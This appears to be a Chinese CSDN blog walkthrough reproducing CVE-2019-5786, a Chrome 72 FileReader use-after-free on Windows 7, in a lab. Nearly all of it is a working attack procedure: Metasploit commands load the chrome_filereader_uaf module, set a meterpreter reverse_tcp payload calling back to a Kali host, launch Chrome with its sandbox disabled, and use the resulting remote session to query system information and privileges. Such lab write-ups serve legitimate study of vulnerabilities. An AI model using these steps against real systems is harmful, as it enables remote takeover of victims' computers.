漏洞影响范围:
CVE-2019-5786适用于Windows 7 x86的Chrome 72.0.3626.119稳定FileReader UaF攻击。
环境
kali
win7 x86
Google_Chrome_(32bit)_v72.0.3626.119
复现
kali启动msf,搜索chrome_filereader利用模块
root@kali:~# msfconsole -q
msf5 > search chrome_filereader
选择模块,查看模块信息
msf5 > use exploit/windows/browser/chrome_filereader_uaf
msf5 exploit(windows/browser/chrome_filereader_uaf) > info
漏洞介绍
选择payload
msf5 exploit(windows/browser/chrome_filereader_uaf) > set payload windows/meterpreter/reverse_tcp
设置payload参数,LHOST设置为kali ip
msf5 exploit(windows/browser/chrome_filereader_uaf) > set URIPATH /
msf5 exploit(windows/browser/chrome_filereader_uaf) > set LHOST 192.168.159.141
创建服务
在win7 x86中打开Google Chrome文件位置
地址栏输入cmd,回车。出现当前目录下的终端
执行语句(以沙箱关闭的状态执行chrome.exe)
C:\Program Files\Google\Chrome\Application>chrome.exe --no-sandbox
在通过此命令打开的chrome浏览器地址栏中输入地址:
http://192.168.159.141:8080
kali成功获得session
选择生成的session
msf5 exploit(windows/browser/chrome_filereader_uaf) > sessions 1
查看当前系统信息,用户权限
meterpreter > sysinfo
meterpreter > getuid
技术无罪,请勿用于恶意用途。
来源:CSDN
作者:沙上有印
链接:https://blog.csdn.net/qq_40334963/article/details/104550617